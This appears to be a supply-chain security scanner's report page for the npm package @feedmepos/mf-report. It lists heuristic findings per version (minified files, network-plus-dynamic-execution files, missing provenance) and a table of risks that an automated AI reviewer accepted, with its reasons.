@feedmepos/mf-report
v5 portal report UI
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:dist/app-DMXIz8ol.js | AI (source-diff): Standard Vite bundle output for this Vue micro-frontend; not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/assets/processTableData.worker-CQMw9rvu.js | AI (source-diff): Minified web worker bundle for table data processing; consistent with package purpose. | ai | |
| source-diff | net-exec-file:dist/NavigationTab.vue_vue_type_script_setup_true_lang-Ck7HaJRh.js | AI (source-diff): Network calls and dynamic imports are normal Vue router/component patterns in this micro-frontend. | ai | |
| source-diff | obfuscated-file:dist/NavigationTab.vue_vue_type_script_setup_true_lang-Ck7HaJRh.js | AI (source-diff): Standard Vite-compiled Vue SFC chunk; not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/Integrations-CpMUHiCw.js | AI (source-diff): Standard Vite bundle chunk; not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/GlobalFilterSelect.vue_vue_type_script_setup_true_lang-ZAOWE1vp.js | AI (source-diff): Standard Vite-compiled Vue SFC chunk; not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/assets/formatChartData.worker-BlVUDagT.js | AI (source-diff): Minified web worker bundle; consistent with chart data processing in this package. | ai | |
| npm-metadata | url-dep:extra-packages | AI (npm-metadata): Local file dep is in devDependencies only; does not affect published package consumers. | ai | |
| dependencies | unvetted-dep:@feedmepos/custom-attributes | AI (dependencies): Same org scope (@feedmepos); internal dependency stable across versions. | ai | |
| dependencies | unvetted-dep:@feedmepos/feature-flag | AI (dependencies): Same org scope (@feedmepos); internal dependency stable across versions. | ai | |
| npm-metadata | url-dep:query-engine-dart | AI (npm-metadata): File-local devDependency used only during build; not shipped in published dist. | ai | |
| npm-metadata | url-dep:report-v4-dart | AI (npm-metadata): File-local devDependency used only during build; not shipped in published dist. | ai | |
| source-diff | obfuscated-file:dist/assets/formatChartData.worker-CVp--g2e.js | AI (source-diff): Minified web worker bundle; Dart/JS interop boilerplate, no exfiltration. | ai | |
| source-diff | obfuscated-file:dist/app-VSV4uxyh.js | AI (source-diff): Standard Vite minified bundle for this Vue micro-frontend; pattern is stable across versions. | ai | |
| source-diff | obfuscated-file:dist/BaseDialog.vue_vue_type_script_setup_true_lang-Be3F_dkn.js | AI (source-diff): Minified Vue component chunk from Vite build; no malicious patterns. | ai | |
| source-diff | obfuscated-file:dist/Integrations-T5mzrxXG.js | AI (source-diff): Minified Vue route chunk from Vite build; no malicious patterns. | ai | |
| source-diff | obfuscated-file:dist/NavigationTab.vue_vue_type_script_setup_true_lang-CoaKAOy7.js | AI (source-diff): Minified Vue component chunk; imports only from same-package and @feedmepos/* deps. | ai | |
| source-diff | net-exec-file:dist/NavigationTab.vue_vue_type_script_setup_true_lang-CoaKAOy7.js | AI (source-diff): Network calls and dynamic component resolution are standard Vue router/async-component patterns in this micro-frontend. | ai | |
| source-diff | obfuscated-file:dist/assets/processTableData.worker-CklDKC06.js | AI (source-diff): Minified web worker for table data processing; same Dart/JS boilerplate as formatChartData worker. | ai | |
| phantom-deps | phantom-dep:dayjs | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:axios | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:xlsx | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:@feedmepos/feature-flag | AI (phantom-deps): Same-org dep; bundled micro-frontend pattern. | ai | |
| phantom-deps | phantom-dep:@casl/ability | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:vuedraggable | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:consola-loki | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:change-case | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:vue-i18n | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:@feedmepos/hrm-permission | AI (phantom-deps): Same-org dep; bundled micro-frontend pattern. | ai | |
| phantom-deps | phantom-dep:@feedmepos/custom-attributes | AI (phantom-deps): Same-org dep; bundled micro-frontend pattern. | ai | |
| phantom-deps | phantom-dep:chart.js | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:consola | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:uuid | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:dotenv | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai |
Versions (showing 8 of 8)
| Version | Deps | Published |
|---|---|---|
| 5.25.8 | 20 / 20 | |
| 5.23.1 | 20 / 20 | |
| 5.22.31 | 20 / 20 | |
| 5.22.15 | 20 / 20 | |
| 5.22.12 | 20 / 20 | |
| 5.22.3 | 18 / 20 | |
| 5.22.1 | 18 / 20 | |
| 5.7.2 | 18 / 21 |
v5.25.8
8 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v5.23.1
8 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v5.22.15
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v5.22.12
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v5.22.3
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v5.22.1
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v5.7.2
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.